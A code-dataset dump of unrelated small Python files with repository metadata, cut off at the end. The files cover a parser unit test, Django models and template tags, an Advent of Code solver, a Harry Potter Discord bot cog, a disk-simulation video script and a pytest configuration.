b718b1cb323c068a0fab21f464ad842ab3d200e7
| 2,924
|
py
|
Python
|
src/TheLanguage/Parser/Expressions/UnitTests/CastExpressionParserInfo_UnitTest.py
|
davidbrownell/DavidBrownell_TheLanguage
|
07170b448a0ebd7fa2325c9ccd4cefdb3cf7eb98
|
[
"BSL-1.0"
] | null | null | null |
src/TheLanguage/Parser/Expressions/UnitTests/CastExpressionParserInfo_UnitTest.py
|
davidbrownell/DavidBrownell_TheLanguage
|
07170b448a0ebd7fa2325c9ccd4cefdb3cf7eb98
|
[
"BSL-1.0"
] | null | null | null |
src/TheLanguage/Parser/Expressions/UnitTests/CastExpressionParserInfo_UnitTest.py
|
davidbrownell/DavidBrownell_TheLanguage
|
07170b448a0ebd7fa2325c9ccd4cefdb3cf7eb98
|
[
"BSL-1.0"
] | 1
|
2021-06-18T18:58:57.000Z
|
2021-06-18T18:58:57.000Z
|
# ----------------------------------------------------------------------
# |
# | CastExpressionParserInfo_UnitTest.py
# |
# | David Brownell <db@DavidBrownell.com>
# | 2021-10-04 09:14:16
# |
# ----------------------------------------------------------------------
# |
# | Copyright David Brownell 2021
# | Distributed under the Boost Software License, Version 1.0. See
# | accompanying file LICENSE_1_0.txt or copy at
# | http://www.boost.org/LICENSE_1_0.txt.
# |
# ----------------------------------------------------------------------
"""Unit test for CastExpressionParserInfo.py"""
import os
import pytest
import CommonEnvironment
from CommonEnvironmentEx.Package import InitRelativeImports
# ----------------------------------------------------------------------
_script_fullpath = CommonEnvironment.ThisFullpath()
_script_dir, _script_name = os.path.split(_script_fullpath)
# ----------------------------------------------------------------------
with InitRelativeImports():
from ..CastExpressionParserInfo import *
from ...Common.AutomatedTests import RegionCreator
from ...Types.StandardTypeParserInfo import StandardTypeParserInfo
# ----------------------------------------------------------------------
def test_TypeWithModifierError():
region_creator = RegionCreator()
with pytest.raises(TypeWithModifierError) as ex:
CastExpressionParserInfo(
[
region_creator(container=True),
region_creator(),
region_creator(),
],
ExpressionParserInfo([region_creator(container=True)]),
StandardTypeParserInfo(
[
region_creator(container=True),
region_creator(),
region_creator(expected_error=True),
],
"TheType",
TypeModifier.val,
),
)
ex = ex.value
assert str(ex) == "Cast expressions may specify a type or a modifier, but not both."
assert ex.Region == region_creator.ExpectedErrorRegion()
# ----------------------------------------------------------------------
def test_InvalidModifierError():
region_creator = RegionCreator()
with pytest.raises(InvalidModifierError) as ex:
CastExpressionParserInfo(
[
region_creator(container=True),
region_creator(),
region_creator(expected_error=True),
],
ExpressionParserInfo([region_creator(container=True),]),
TypeModifier.mutable,
)
ex = ex.value
assert str(ex) == "'mutable' cannot be used in cast expressions; supported values are 'ref', 'val', 'view'."
assert ex.Region == region_creator.ExpectedErrorRegion()
| 34.4
| 113
| 0.499316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,053
| 0.360123
|
b71a0544974b49622ebf65934372dde5c8e554ce
| 363
|
py
|
Python
|
backend/api/models.py
|
pranav2812/9th-inter-iit-traffic-sign
|
27d3f14ce8235d5cdedb4bb2dbaa10e436f9b06b
|
[
"Apache-2.0"
] | 1
|
2021-04-13T07:56:17.000Z
|
2021-04-13T07:56:17.000Z
|
backend/api/models.py
|
Tech-Meet-Solutions/Bosch-CV-9th-InterIIT
|
57f4bd915c4a1e2146a77210e92d756e1cc3722a
|
[
"Apache-2.0"
] | 1
|
2021-04-09T11:52:01.000Z
|
2021-04-09T12:21:36.000Z
|
backend/api/models.py
|
pranav2812/9th-inter-iit-traffic-sign
|
27d3f14ce8235d5cdedb4bb2dbaa10e436f9b06b
|
[
"Apache-2.0"
] | 3
|
2021-04-15T10:43:06.000Z
|
2021-05-16T00:36:39.000Z
|
from django.db import models
class File(models.Model):
id = models.AutoField(primary_key= True)
b64 = models.TextField(blank=False, null=False)
lastedit = models.DateTimeField(auto_now= True)
image_class = models.TextField(blank = True, default = "")
labels = models.TextField(blank = True, default= "")
def __str__(self):
return f"Image no.: {self.id}"
| 33
| 59
| 0.730028
| 332
| 0.914601
| 0
| 0
| 0
| 0
| 0
| 0
| 27
| 0.07438
|
b71ce22664f675b460275b3803f757d02f90c92c
| 189
|
py
|
Python
|
release/Server/__init__.py
|
cdfmlr/readquickly_WeChatSmallApp
|
e489c507bfbf81a9a43872919000b99b803a079c
|
[
"MIT"
] | 2
|
2019-04-03T13:19:32.000Z
|
2019-04-03T23:20:27.000Z
|
release/Server/__init__.py
|
cdfmlr/readquickly_WeChatSmallApp
|
e489c507bfbf81a9a43872919000b99b803a079c
|
[
"MIT"
] | 1
|
2019-04-03T16:44:36.000Z
|
2019-04-03T23:16:35.000Z
|
release/Server/__init__.py
|
A666AHL/readquickly_WeChatSmallApp
|
7324b7bdd7cf6b7a77e127969077d1c84ada189d
|
[
"MIT"
] | 2
|
2019-04-04T08:38:08.000Z
|
2019-04-04T09:01:42.000Z
|
'''
# ReadQuickly 后端
```
|-- Server
|-- __init__.py
|-- server.py (请求服务器)
|-- content.py (整合响应数据)
|-- spider (爬虫包)
|-- weather (天气包)
|-- notice (通知包)
```
'''
| 12.6
| 28
| 0.449735
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 233
| 1
|
b71d1eb99d842362c6523cbc96a06ae382953062
| 1,746
|
py
|
Python
|
JB/5.py
|
boostjanbjorge/adventofcode
|
5cdd540a553550b1000496dfa39cbf7cf431a85f
|
[
"MIT"
] | null | null | null |
JB/5.py
|
boostjanbjorge/adventofcode
|
5cdd540a553550b1000496dfa39cbf7cf431a85f
|
[
"MIT"
] | null | null | null |
JB/5.py
|
boostjanbjorge/adventofcode
|
5cdd540a553550b1000496dfa39cbf7cf431a85f
|
[
"MIT"
] | null | null | null |
import collections
import dataclasses
import itertools
@dataclasses.dataclass(frozen=True)
class Point:
x: int
y: int
@dataclasses.dataclass(frozen=True)
class Segment:
start: Point
stop: Point
@property
def slope(self):
dy = self.stop.y - self.start.y
dx = self.stop.x - self.start.x
return dy / dx
@property
def y_intercept(self):
# y = slope * x + b
# b = y - slope * x, x->start.x
return self.start.y - self.slope * self.start.x
def points(self):
min_y = min(self.start.y, self.stop.y)
max_y = max(self.start.y, self.stop.y)
min_x = min(self.start.x, self.stop.x)
max_x = max(self.start.x, self.stop.x)
if self.start.x == self.stop.x:
for y in range(min_y, max_y + 1):
yield Point(self.start.x, y)
else:
for x in range(min_x, max_x + 1):
yield Point(x, round(self.slope * x + self.y_intercept))
def segments():
with open("inputs/5.txt") as f:
points = f.readlines()
points = (p.strip() for p in points)
points = (p.split("->") for p in points)
points = ((p1.split(","), p2.split(",")) for p1, p2 in points)
for (p1x, p1y), (p2x, p2y) in points:
yield Segment(
Point(int(p1x), int(p1y)),
Point(int(p2x), int(p2y)),
)
def count_interception(S: Segment):
cnt = collections.Counter(itertools.chain.from_iterable(s.points() for s in S))
return sum(1 for v in cnt.values() if v > 1)
# 13319, to high
print(
count_interception(
s for s in segments() if s.start.x == s.stop.x or s.start.y == s.stop.y
)
)
# 19172
print(count_interception(segments()))
| 23.594595
| 83
| 0.57331
| 864
| 0.494845
| 862
| 0.4937
| 936
| 0.536082
| 0
| 0
| 97
| 0.055556
|
b71e4d45d0dd84308fd2a62e675360e49475c3fc
| 3,140
|
py
|
Python
|
readthedocs/search/parse_json.py
|
darrowco/readthedocs.org
|
fa7fc5a24306f1f6a27c7393f381c594ab29b357
|
[
"MIT"
] | null | null | null |
readthedocs/search/parse_json.py
|
darrowco/readthedocs.org
|
fa7fc5a24306f1f6a27c7393f381c594ab29b357
|
[
"MIT"
] | null | null | null |
readthedocs/search/parse_json.py
|
darrowco/readthedocs.org
|
fa7fc5a24306f1f6a27c7393f381c594ab29b357
|
[
"MIT"
] | null | null | null |
"""Functions related to converting content into dict/JSON structures."""
import codecs
import json
import logging
from pyquery import PyQuery
log = logging.getLogger(__name__)
def generate_sections_from_pyquery(body):
"""Given a pyquery object, generate section dicts for each section."""
# Capture text inside h1 before the first h2
h1_section = body('.section > h1')
if h1_section:
div = h1_section.parent()
h1_title = h1_section.text().replace('¶', '').strip()
h1_id = div.attr('id')
h1_content = ''
next_p = body('h1').next()
while next_p:
if next_p[0].tag == 'div' and 'class' in next_p[0].attrib:
if 'section' in next_p[0].attrib['class']:
break
h1_content += parse_content(next_p.text())
next_p = next_p.next()
if h1_content:
yield {
'id': h1_id,
'title': h1_title,
'content': h1_content.replace('\n', '. '),
}
# Capture text inside h2's
section_list = body('.section > h2')
for num in range(len(section_list)):
div = section_list.eq(num).parent()
header = section_list.eq(num)
title = header.text().replace('¶', '').strip()
section_id = div.attr('id')
content = div.text()
content = parse_content(content)
yield {
'id': section_id,
'title': title,
'content': content,
}
def process_file(fjson_filename):
"""Read the fjson file from disk and parse it into a structured dict."""
try:
with codecs.open(fjson_filename, encoding='utf-8', mode='r') as f:
file_contents = f.read()
except IOError:
log.info('Unable to read file: %s', fjson_filename)
raise
data = json.loads(file_contents)
sections = []
path = ''
title = ''
if 'current_page_name' in data:
path = data['current_page_name']
else:
log.info('Unable to index file due to no name %s', fjson_filename)
if data.get('body'):
body = PyQuery(data['body'])
sections.extend(generate_sections_from_pyquery(body))
else:
log.info('Unable to index content for: %s', fjson_filename)
if 'title' in data:
title = data['title']
if title.startswith('<'):
title = PyQuery(data['title']).text()
else:
log.info('Unable to index title for: %s', fjson_filename)
return {
'path': path,
'title': title,
'sections': sections,
}
def parse_content(content):
"""
Removes the starting text and ¶.
It removes the starting text from the content
because it contains the title of that content,
which is redundant here.
"""
content = content.replace('¶', '').strip()
# removing the starting text of each
content = content.split('\n')
if len(content) > 1: # there were \n
content = content[1:]
# converting newlines to ". "
content = '. '.join([text.strip().rstrip('.') for text in content])
return content
| 28.288288
| 76
| 0.576752
| 0
| 0
| 1,335
| 0.424618
| 0
| 0
| 0
| 0
| 933
| 0.296756
|
b71eb8d88a38241242bcf5b67fab2d3309817366
| 8,427
|
py
|
Python
|
pottermore/pottermore.py
|
Ricotjhe/kennnyshiwa-cogs
|
5a596f298a6f7fe7502634793384a747060fc6c7
|
[
"MIT"
] | null | null | null |
pottermore/pottermore.py
|
Ricotjhe/kennnyshiwa-cogs
|
5a596f298a6f7fe7502634793384a747060fc6c7
|
[
"MIT"
] | null | null | null |
pottermore/pottermore.py
|
Ricotjhe/kennnyshiwa-cogs
|
5a596f298a6f7fe7502634793384a747060fc6c7
|
[
"MIT"
] | null | null | null |
import contextlib
from redbot.core import commands, Config
from redbot.core.utils.menus import menu, DEFAULT_CONTROLS
import discord
import aiohttp
import random
slytherin = "https://cdn.shopify.com/s/files/1/1325/3287/products/HP8040B_930f8033-607f-41ee-a8e4-fa90871ce7a7.png?v=1546231154"
gryffindor = "https://cdn10.bigcommerce.com/s-9p3fydit/products/370/images/1328/gryff1c__34591.1449620321.1280.1280.PNG?c=2"
ravenclaw = "https://cdn10.bigcommerce.com/s-9p3fydit/products/372/images/1332/raven1c__54237.1449620971.1200.1200.PNG?c=2"
hufflepuff = "https://cdn.shopify.com/s/files/1/0221/1146/products/Hufflepuff_Embroidered_Patch_Scaled_large.png?v=1553528874"
harry = "https://www.freepngimg.com/thumb/harry_potter/5-2-harry-potter-png-file.png"
hermione = "https://66.media.tumblr.com/3ce8453be755f31f93381918985b4918/tumblr_nn2lopIypj1rxkqbso1_1280.png"
voldemort = (
"https://vignette.wikia.nocookie.net/harrypotter/images/6/6e/VoldemortHeadshot_DHP1.png"
)
snape = "https://vignette.wikia.nocookie.net/harrypotter/images/a/a3/Severus_Snape.jpg"
draco = "https://vignette.wikia.nocookie.net/harrypotter/images/7/7e/Draco_Malfoy_TDH.png"
dumbledore = "https://images.ctfassets.net/bxd3o8b291gf/5ocauY6zAsqGiIgeECw06e/8accc1c586d2be7d9de6a3d9aec37b90/AlbusDumbledore_WB_F1_DumbledoreSmiling_Still_080615_Port.jpg"
ron = "https://upload.wikimedia.org/wikipedia/en/thumb/5/5e/Ron_Weasley_poster.jpg/220px-Ron_Weasley_poster.jpg"
hagrid = "https://vignette.wikia.nocookie.net/harrypotter/images/e/ee/Rubeushagrid.PNG/revision/latest?cb=20161123044204"
ginny = "http://hp-intothefire.wdfiles.com/local--files/ginny/ginny.jpg"
sirius = "https://vignette.wikia.nocookie.net/harrypotter/images/7/75/Sirius_Black_profile.jpg/revision/latest?cb=20150918055024"
mcgonagall = "https://vignette.wikia.nocookie.net/harrypotter/images/6/65/ProfessorMcGonagall-HBP.jpg/revision/latest?cb=20100612114856"
class Pottermore(commands.Cog):
"""Lookup information about the Harry Potter Universe"""
__author__ = "kennnyshiwa"
def __init__(self, bot):
self.bot = bot
self.session = aiohttp.ClientSession(loop=self.bot.loop)
self.config = Config.get_conf(self, 376564057517457408, force_registration=True)
default_user = {"house": None}
self.config.register_user(**default_user)
@commands.bot_has_permissions(embed_links=True)
@commands.command()
async def housesort(self, ctx):
"""Find your Harry Potter House"""
if await self.config.user(ctx.author).house() is None:
async with self.session.get("https://www.potterapi.com/v1/sortinghat") as r:
data = await r.json()
house = data
await self.config.user(ctx.author).house.set(str(house))
color = await ctx.embed_color()
house_user = await self.config.user(ctx.author).house()
if house_user == "Slytherin":
image = slytherin
embed = discord.Embed(
title="Find your Harry Potter House", description=house_user, color=color
)
embed.set_thumbnail(url=image)
if house_user == "Gryffindor":
image = gryffindor
embed = discord.Embed(
title="Find your Harry Potter House", description=house_user, color=color
)
embed.set_thumbnail(url=image)
if house_user == "Ravenclaw":
image = ravenclaw
embed = discord.Embed(
title="Find your Harry Potter House", description=house_user, color=color
)
embed.set_thumbnail(url=image)
if house_user == "Hufflepuff":
image = hufflepuff
embed = discord.Embed(
title="Find your Harry Potter House", description=house_user, color=color
)
embed.set_thumbnail(url=image)
await ctx.send(embed=embed)
@staticmethod
async def do_lookup(query: str) -> list:
"""Run pottermore lookup pic lookup"""
base_url = "https://www.potterapi.com/v1/characters/?key=$2a$10$ZiItg0fhdYll4R2A4hNareLdTmuYByHnzL9mSqw3r7Mkh/nMh2WUa&name=%s"
async with aiohttp.ClientSession() as session:
async with session.get(base_url % query) as r:
data = await r.json()
if not data or isinstance(data, dict):
return None
return data[0]
def escape_query(self, query) -> str:
"""Escape mentions from queries"""
return query.replace("`", "'")
@commands.bot_has_permissions(embed_links=True)
@commands.command()
async def charactersearch(self, ctx, *, query):
"""
Search for Harry Potter characters
Note: Searchs are case senseative and require full name
"""
async with ctx.typing():
query = self.escape_query("".join(query))
pottermore_data = await self.do_lookup(query)
if not pottermore_data:
await ctx.send("🔮 Muggle error! Could not find `%s`" % query)
return
if "alias" in pottermore_data:
alias = pottermore_data["alias"]
else:
alias = ""
embed = discord.Embed(
title=pottermore_data["name"], description=alias, color=await ctx.embed_color()
)
name = pottermore_data["name"]
if name == "Harry Potter":
embed.set_thumbnail(url=harry)
if name == "Hermione Granger":
embed.set_thumbnail(url=hermione)
if name == "Lord Voldemort":
embed.set_thumbnail(url=voldemort)
if name == "Severus Snape":
embed.set_thumbnail(url=snape)
if name == "Albus Dumbledore":
embed.set_thumbnail(url=dumbledore)
if name == "Draco Malfoy":
embed.set_thumbnail(url=draco)
if name == "Ron Weasley":
embed.set_thumbnail(url=ron)
if name == "Rubeus Hagrid":
embed.set_thumbnail(url=hagrid)
if name == "Ginny Weasley":
embed.set_thumbnail(url=ginny)
if name == "Sirius Black":
embed.set_thumbnail(url=sirius)
if name == "Minerva McGonagall":
embed.set_thumbnail(url=mcgonagall)
if "house" in pottermore_data:
embed.add_field(name="House", value=pottermore_data["house"], inline=True)
if "school" in pottermore_data:
embed.add_field(name="School Name", value=pottermore_data["school"], inline=True)
if "role" in pottermore_data:
embed.add_field(name="Role", value=pottermore_data["role"], inline=True)
if "wand" in pottermore_data:
embed.add_field(name="Wand", value=pottermore_data["wand"], inline=True)
if "boggart" in pottermore_data:
embed.add_field(name="Boggart", value=pottermore_data["boggart"], inline=True)
if "patronus" in pottermore_data:
embed.add_field(name="Patronus", value=pottermore_data["patronus"], inline=True)
if pottermore_data["ministryOfMagic"] == False:
embed.add_field(name="Ministry of Magic", value="Not a member", inline=True)
else:
embed.add_field(name="Ministry of Magic", value="Member", inline=True)
if pottermore_data["orderOfThePhoenix"] == False:
embed.add_field(name="Order Of The Phoenix", value="Not a member", inline=True)
else:
embed.add_field(name="Order Of The Phoenix", value="Member", inline=True)
if pottermore_data["dumbledoresArmy"] == False:
embed.add_field(name="Dumbledores Army", value="Not a member", inline=True)
else:
embed.add_field(name="Dumbledores Army", value="Member", inline=True)
if pottermore_data["deathEater"] == False:
embed.add_field(name="DeathEater", value="No", inline=True)
else:
embed.add_field(name="DeathEater", value="Yes", inline=True)
embed.add_field(name="Blood Status", value=pottermore_data["bloodStatus"], inline=True)
embed.add_field(name="Species", value=pottermore_data["species"], inline=True)
if "animagus" in pottermore_data:
embed.add_field(name="Animagus", value=pottermore_data["animagus"], inline=True)
await ctx.send(embed=embed)
def cog_unload(self):
self.bot.loop.create_task(self.session.close())
| 48.154286
| 174
| 0.657411
| 6,523
| 0.773784
| 0
| 0
| 5,875
| 0.696916
| 5,705
| 0.67675
| 2,944
| 0.349229
|
b71f0ad71dba6e7fc8ad5d041a1cde7948bbc25f
| 117
|
py
|
Python
|
contacts/views/contact_views.py
|
Onlynfk/Freshdesk-CRM-Platform
|
67137af09f7daf6fa2d19a9e70d573548137c9db
|
[
"MIT"
] | null | null | null |
contacts/views/contact_views.py
|
Onlynfk/Freshdesk-CRM-Platform
|
67137af09f7daf6fa2d19a9e70d573548137c9db
|
[
"MIT"
] | null | null | null |
contacts/views/contact_views.py
|
Onlynfk/Freshdesk-CRM-Platform
|
67137af09f7daf6fa2d19a9e70d573548137c9db
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
def contact(request):
return render(request, 'contacts/contact.html')
| 19.5
| 52
| 0.735043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 23
| 0.196581
|
b721a7e3b07e02d858ee3ed05e23ae34bf1e9c54
| 781
|
py
|
Python
|
algoritmos/PythonM2/desafio.py
|
MiguelTeixeiraUFPB/PythonM2
|
1ee07879b141eae4c4edd5f4ac43002b11167b2f
|
[
"MIT"
] | null | null | null |
algoritmos/PythonM2/desafio.py
|
MiguelTeixeiraUFPB/PythonM2
|
1ee07879b141eae4c4edd5f4ac43002b11167b2f
|
[
"MIT"
] | null | null | null |
algoritmos/PythonM2/desafio.py
|
MiguelTeixeiraUFPB/PythonM2
|
1ee07879b141eae4c4edd5f4ac43002b11167b2f
|
[
"MIT"
] | null | null | null |
idadevelho=0
s=0
f=0
for p in range(1,3):
print('---{}º pessoa---'.format(p))
nome=str(input('digite o {}º nome: '.format(p))).strip()
idade=int(input('digite a idade da {}º pessoa: '.format(p)))
peso=float(input('digite o peso da {}º pessoa: '.format(p)))
sexo=str(input('sexo[M/F]: ')).upper().strip()
s+=idade
if p==1 and sexo=='M':
idadevelho=idade
nomevelho=nome
elif sexo=='M' and idade>idadevelho:
idadevelho=idade
nomevelho=nome
print()
if sexo=='F' and idade<20:
f+=1
nomemulher=nome
media=s/2
print('o nome do homem mais velho é',nomevelho)
print('a média de idade é {}'.format(media))
print('a quantidade de mulheres com menos de 20 anos {}'.format(f))
| 27.892857
| 67
| 0.581306
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 234
| 0.296954
|
b721cd3010a8637974b6ec065b10132ac28ed47b
| 1,957
|
py
|
Python
|
createVideo.py
|
Thefalas/disksMD
|
1f3a0a1814baf1fd8905da2e88d2244de90d14ec
|
[
"MIT"
] | null | null | null |
createVideo.py
|
Thefalas/disksMD
|
1f3a0a1814baf1fd8905da2e88d2244de90d14ec
|
[
"MIT"
] | null | null | null |
createVideo.py
|
Thefalas/disksMD
|
1f3a0a1814baf1fd8905da2e88d2244de90d14ec
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Thu May 3 18:33:28 2018
@author: malopez
"""
import pandas as pd
import matplotlib.pyplot as plt
import cv2
images_folder = "C:/Users/malopez/Desktop/disksMD/images"
data_folder = "C:/Users/malopez/Desktop/disksMD/data"
output_video = './video4.mp4'
particle_radius = 1.0
n_particles = 90 # TODO: Why 3 is the minimun number of particles?
desired_collisions_per_particle = 10
n_collisions = n_particles*desired_collisions_per_particle
size_X = 60 # System size X
size_Y = 30 # System size Y
size_X_inches = 6*(size_X/size_Y)
size_Y_inches = 6
size_figure = (size_X_inches, size_Y_inches)
# Fenomenological constant ;p
circle_size = 11875*size_X_inches*size_Y_inches / (size_X*size_Y)
# circle_size = particle_radius*427500 / (size_X*size_Y)
for i in range(n_collisions):
file_name_pos = data_folder + "/xy"+'{0:05d}'.format(i)+".dat"
pos = pd.read_table(file_name_pos, sep='\s+',
header = None, names =['x', 'y'])
img_name = images_folder+'/img'+'{0:05d}'.format(i)+".png"
fig, ax = plt.subplots(figsize=size_figure, dpi=250)
ax.set_xlim([0,size_X])
ax.set_ylim([0,size_Y])
plt.scatter(pos.x, pos.y, s=circle_size)
fig.savefig(img_name)
print('Saving img nº: '+str(i))
plt.close()
images = []
for i in range(n_collisions):
images.append(images_folder+'/img'+'{0:05d}'.format(i)+".png")
# Height and Width from first image
frame = cv2.imread(images[0])
height, width, channels = frame.shape
# Definimos el codec y creamos un objeto VideoWriter
fourcc = cv2.VideoWriter_fourcc(*'mp4v') # Be sure to use lower case
out = cv2.VideoWriter(output_video, fourcc, 30.0, (width, height))
print('Generating video, please wait')
for image in images:
frame = cv2.imread(image)
# Write out frame to video
out.write(frame)
# Release everything if job is finished
out.release()
print("The output video is {}".format(output_video))
| 29.651515
| 68
| 0.701073
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 673
| 0.343718
|
b7222728ba7e52a01bbb0861ac4236dbfa5ce453
| 1,003
|
py
|
Python
|
utils/builder/register_builder/riscv/BootPriority.py
|
noahsherrill/force-riscv
|
500cec3017f619dbf853a497bf02eaeecca927c9
|
[
"Apache-2.0"
] | 111
|
2020-06-12T22:31:30.000Z
|
2022-03-19T03:45:20.000Z
|
utils/builder/register_builder/riscv/BootPriority.py
|
noahsherrill/force-riscv
|
500cec3017f619dbf853a497bf02eaeecca927c9
|
[
"Apache-2.0"
] | 34
|
2020-06-12T20:23:40.000Z
|
2022-03-15T20:04:31.000Z
|
utils/builder/register_builder/riscv/BootPriority.py
|
noahsherrill/force-riscv
|
500cec3017f619dbf853a497bf02eaeecca927c9
|
[
"Apache-2.0"
] | 32
|
2020-06-12T19:15:26.000Z
|
2022-02-20T11:38:31.000Z
|
#
# Copyright (C) [2020] Futurewei Technologies, Inc.
#
# FORCE-RISCV is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES
# OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# BootPriority.py
#
# This file defines the BootPriority helper class.
# The boot priority class defines helper methods associated with boot priority
class BootPriority:
# Returns the appropriate boot priority based on the name and type of
# register provided along with if the register is write only
def getBootPriority(aName=None, aType=None, aWriteOnly=0):
return 1
| 37.148148
| 78
| 0.755733
| 238
| 0.237288
| 0
| 0
| 0
| 0
| 0
| 0
| 872
| 0.869392
|
b72306e350f2a9f34586f4bdf8fb4a7f6ec9f932
| 4,141
|
py
|
Python
|
truffe2/generic/templatetags/generic_extras.py
|
JonathanCollaud/truffe2
|
5cbb055ac1acf7e7dc697340618fcb56c67fbd91
|
[
"BSD-2-Clause"
] | 9
|
2016-09-14T02:19:19.000Z
|
2020-10-18T14:52:14.000Z
|
truffe2/generic/templatetags/generic_extras.py
|
JonathanCollaud/truffe2
|
5cbb055ac1acf7e7dc697340618fcb56c67fbd91
|
[
"BSD-2-Clause"
] | 19
|
2016-11-09T21:28:51.000Z
|
2021-02-10T22:37:31.000Z
|
truffe2/generic/templatetags/generic_extras.py
|
JonathanCollaud/truffe2
|
5cbb055ac1acf7e7dc697340618fcb56c67fbd91
|
[
"BSD-2-Clause"
] | 13
|
2016-12-31T14:22:09.000Z
|
2020-12-27T19:43:19.000Z
|
from django import template
from django.utils.safestring import mark_safe
import bleach
from bleach.sanitizer import BleachSanitizer
from bleach.encoding import force_unicode
from bootstrap3.renderers import FieldRenderer
from bootstrap3.text import text_value
import html5lib
import re
register = template.Library()
pos = [(0, 0), (1, 0), (0, 1), (2, 3), (1, 2), (2, 1), (2, 2)]
re_spaceless = re.compile("(\n|\r)+")
@register.filter
def node_x(value):
x, _ = pos[value]
return x
@register.filter
def node_y(value):
_, y = pos[value]
return y
@register.filter
def get_attr(value, arg):
v = getattr(value, arg, None)
if hasattr(v, '__call__'):
v = v()
elif isinstance(value, dict):
v = value.get(arg)
if v is None:
return ''
return v
@register.filter
def call(obj, methodName):
method = getattr(obj, methodName)
if "__callArg" in obj.__dict__:
ret = method(*obj.__callArg)
del obj.__callArg
return ret
return method()
@register.filter
def args(obj, arg):
if "__callArg" not in obj.__dict__:
obj.__callArg = []
obj.__callArg += [arg]
return obj
@register.filter
def get_class(value):
return value.__class__.__name__
@register.filter
def is_new_for(obj, user):
return obj.is_new(user)
@register.simple_tag(takes_context=True)
def switchable(context, obj, user, id):
return 'true' if obj.may_switch_to(user, id) else 'false'
@register.assignment_tag(takes_context=True)
def get_list_quick_switch(context, obj):
if hasattr(obj.MetaState, 'list_quick_switch'):
return filter(lambda (status, __, ___): obj.may_switch_to(context['user'], status), obj.MetaState.list_quick_switch.get(obj.status, []))
@register.assignment_tag(takes_context=True)
def get_states_quick_switch(context, obj):
if hasattr(obj.MetaState, 'states_quick_switch'):
return filter(lambda (status, __): obj.may_switch_to(context['user'], status), obj.MetaState.states_quick_switch.get(obj.status, []))
@register.tag
def nocrlf(parser, token):
nodelist = parser.parse(('endnocrlf',))
parser.delete_first_token()
return CrlfNode(nodelist)
class CrlfNode(template.Node):
def __init__(self, nodelist):
self.nodelist = nodelist
def render(self, context):
rendered = self.nodelist.render(context).strip()
return re_spaceless.sub("", rendered)
@register.filter
def html_check_and_safe(value):
tags = bleach.ALLOWED_TAGS + ['div', 'br', 'font', 'p', 'table', 'tr', 'td', 'th', 'img', 'u', 'span', 'tbody', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'hr']
attrs = {
'*': ['class', 'style', 'color', 'align', 'title', 'data-toggle', 'data-placement'],
'a': ['href', 'rel'],
'img': ['src', 'alt'],
}
style = ['line-height', 'background-color', 'font-size', 'margin-top']
text = force_unicode(value)
class s(BleachSanitizer):
allowed_elements = tags
allowed_attributes = attrs
allowed_css_properties = style
strip_disallowed_elements = True
strip_html_comments = True
allowed_protocols = ['http', 'https', 'data']
parser = html5lib.HTMLParser(tokenizer=s)
return mark_safe(bleach._render(parser.parseFragment(text)))
class SimpleFieldRenderer(FieldRenderer):
def render(self):
# See if we're not excluded
if self.field.name in self.exclude.replace(' ', '').split(','):
return ''
# Hidden input requires no special treatment
if self.field.is_hidden:
return text_value(self.field)
# Render the widget
self.add_widget_attrs()
html = self.field.as_widget(attrs=self.widget.attrs)
self.restore_widget_attrs()
# Start post render
html = self.post_widget_render(html)
html = self.wrap_widget(html)
html = self.make_input_group(html)
html = self.append_to_field(html)
html = self.wrap_field(html)
return html
@register.simple_tag()
def simple_bootstrap_field(field):
return SimpleFieldRenderer(field).render()
| 26.375796
| 157
| 0.657088
| 1,226
| 0.296064
| 0
| 0
| 2,710
| 0.654431
| 0
| 0
| 496
| 0.119778
|
b7243a1265f9290fb4007832856d3ae61b5b1b98
| 1,158
|
py
|
Python
|
tests/conftest.py
|
inducer/courseflow
|
0f9786e3616dbedf08365d81a731f672b97ba9f5
|
[
"Unlicense"
] | 284
|
2015-01-09T12:02:28.000Z
|
2022-03-27T14:30:46.000Z
|
tests/conftest.py
|
inducer/courseflow
|
0f9786e3616dbedf08365d81a731f672b97ba9f5
|
[
"Unlicense"
] | 799
|
2015-02-26T08:49:46.000Z
|
2022-03-31T16:09:26.000Z
|
tests/conftest.py
|
davis68/relate
|
eb40c8c17d4a724a60de3caa3334521a833bad5c
|
[
"Unlicense"
] | 120
|
2015-01-30T18:00:56.000Z
|
2022-03-28T06:24:43.000Z
|
import pytest
# from pytest_factoryboy import register
def pytest_addoption(parser):
parser.addoption(
"--slow", action="store_true", default=False, help="run slow tests",
)
parser.addoption(
"--all", action="store_true", default=False, help="run all tests",
)
def _is_connection_psql():
from django.db import connection
return connection.vendor == 'postgresql'
def pytest_collection_modifyitems(config, items):
skip_pg = pytest.mark.skip(reason="connection is not a postgres database")
if not _is_connection_psql():
for item in items:
if "postgres" in item.keywords:
item.add_marker(skip_pg)
if config.getoption("--all"):
return
elif config.getoption("--slow"):
skip_non_slow = pytest.mark.skip(reason="need --slow option to run")
for item in items:
if "slow" not in item.keywords:
item.add_marker(skip_non_slow)
else:
skip_slow = pytest.mark.skip(reason="need --slow option to run")
for item in items:
if "slow" in item.keywords:
item.add_marker(skip_slow)
| 30.473684
| 78
| 0.636442
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 252
| 0.217617
|
b72448ecc9aed4165b8b074fbdda6ef50c31088e
| 2,210
|
py
|
Python
|
main.py
|
Kallu609/mp3-to-mp4-converter
|
780d4741b79a45c1e5541527a58313a36d665e47
|
[
"MIT"
] | null | null | null |
main.py
|
Kallu609/mp3-to-mp4-converter
|
780d4741b79a45c1e5541527a58313a36d665e47
|
[
"MIT"
] | null | null | null |
main.py
|
Kallu609/mp3-to-mp4-converter
|
